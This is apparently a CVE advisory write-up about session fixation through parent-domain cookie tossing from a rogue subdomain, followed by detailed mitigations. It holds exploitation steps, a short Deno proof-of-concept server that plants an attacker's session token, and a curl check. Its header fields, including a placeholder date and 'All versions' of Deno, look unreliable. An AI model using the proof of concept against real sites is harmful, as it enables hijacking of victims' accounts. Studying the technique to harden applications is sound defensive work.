How the CVE Works:
This vulnerability arises when an attacker-controlled subdomain (e.g., evil.host.com) sets cookies scoped to the parent domain (host.com; the leading dot in `Domain=.host.com` is ignored by browsers). Browsers send a cookie whose Domain attribute is host.com to every host under host.com, so the attacker can plant a session token that applications on sibling subdomains (e.g., community.host.com) will read. If such an application keeps the same session token across authentication instead of issuing a new one, this becomes session fixation: the attacker first obtains a token of their own from community.host.com, lures the victim to the malicious subdomain, and has the server there set that token as a cookie for the parent domain. The victim's subsequent requests to community.host.com carry the attacker's token; once the victim logs in, that token identifies the victim's authenticated session, and the attacker, who still holds it, can use it. One caveat a practitioner should know: the planted cookie does not replace a host-only cookie the victim already holds for community.host.com, because the two differ in domain. Both are sent, and browsers order them by longest path first, then earliest creation time (RFC 6265 §5.4), so an attacker who scopes the planted cookie to a longer path such as `/login` gets it listed first, which is the one most server frameworks read. The vulnerability is exploitable only if the parent domain is not on the Public Suffix List (PSL), since browsers reject a Domain attribute that names a public suffix, and the attacker controls a subdomain of it (a direct child such as evil.host.com is the usual case, but any host that domain-matches host.com can set the cookie).
DailyCVE Form:
Platform: Deno
Version: All versions
Vulnerability: Session Hijacking
Severity: Critical
Date: 2023-10-XX
What Undercode Say:
Exploitation:
- Attacker Setup: Host a server on a controlled subdomain (e.g., `evil.host.com`).
- Harvest Session Token: The attacker visits `community.host.com` to obtain a session token of their own; this is the value that will be planted.
- Victim Interaction: The victim clicks a link to `https://evil.host.com`.
- Cookie Override: The server sets a cookie with `Domain=.host.com` carrying the harvested token, under the same cookie name the target application reads.
- Session Hijacking: The victim's requests to `community.host.com` now carry the attacker's token. When the victim authenticates and the application does not rotate the token, the attacker's copy of it is bound to the victim's authenticated session.
Commands and Code:
– Exploit Server (Deno):
```javascript
// Exploit server: every response carries a cookie scoped to the parent domain.
// The cookie name must be the one community.host.com reads. Browsers only store
// a Secure cookie from an HTTPS response, so a real PoC serves this over TLS
// (or drops the Secure attribute for a plain-HTTP test).
Deno.serve(
  {
    port: 8000,
    hostname: "evil.host.com",
    onListen: (o) => console.log(`Server started at http://${o.hostname}:${o.port}`),
  },
  (_req) =>
    new Response("Session hijacked!", {
      status: 200,
      headers: {
        "set-cookie": "session_cookie=attacker_token; Domain=.host.com; Secure; HttpOnly",
      },
    }),
);
```
– Verify Cookie Setting (the port must match the one the server listens on; curl prints the header regardless, whereas a browser only stores a `Secure` cookie when the response arrived over HTTPS):
curl -sI http://evil.host.com:8000
Protection:
1. Session Token Rotation:
```javascript
// After successful authentication: discard the session the request carried
// (it may have been planted by an attacker) and issue a fresh token.
invalidateOldSession();
const newToken = generateToken();
```
2. Cookie Scoping:
Omit the `Domain` attribute entirely so the cookie is host-only and is sent to `community.host.com` alone; `Domain=community.host.com` would still be a domain cookie that every host under `community.host.com` receives. Name the cookie with the `__Host-` prefix: browsers accept such a cookie only when it has no `Domain` attribute, has `Secure`, and has `Path=/`, so a sibling subdomain cannot set a cookie of that name for the application.
```javascript
// Host-only cookie (no Domain attribute) with the __Host- prefix:
"Set-Cookie": "__Host-session=token; Path=/; Secure; HttpOnly; SameSite=Lax";
```
3. Public Suffix List Registration:
- Submit `host.com` to the Public Suffix List (https://publicsuffix.org/submit/, maintained at https://github.com/publicsuffix/list). Do this only when subdomains of `host.com` are genuinely handed to untrusted parties: once listed, browsers refuse `Domain=host.com` from every subdomain, and no cookie can be set for `host.com` itself either.
4. Browser Security (enforced by modern browsers, listed for completeness):
- A cookie's `Domain` attribute is accepted only if the request host domain-matches it, i.e., only domains the server is authoritative for (RFC 6265 §5.3).
- A `Domain` attribute that names a public suffix is rejected; browsers validate it against the Public Suffix List.
Analytics:
- Impact: Account takeover, data exposure, and unauthorized access.
- Prerequisites:
  - Attacker controls a subdomain of the parent domain (e.g., `evil.host.com`; any host that domain-matches `host.com` can set the cookie, a direct child being the usual case).
  - Parent domain is not PSL-listed.
  - Session tokens persist across authentication (no rotation on login).
References:
- RFC 6265 §5.1.3 (domain matching), §5.3 (cookie storage and domain validation), §5.4 (Cookie header ordering): https://www.rfc-editor.org/rfc/rfc6265
- Public Suffix List: https://publicsuffix.org/
By following these steps, developers can mitigate the risk of session hijacking and protect their applications from this critical vulnerability.
Reported By: https://github.com/advisories/GHSA-hg9j-64wp-m9px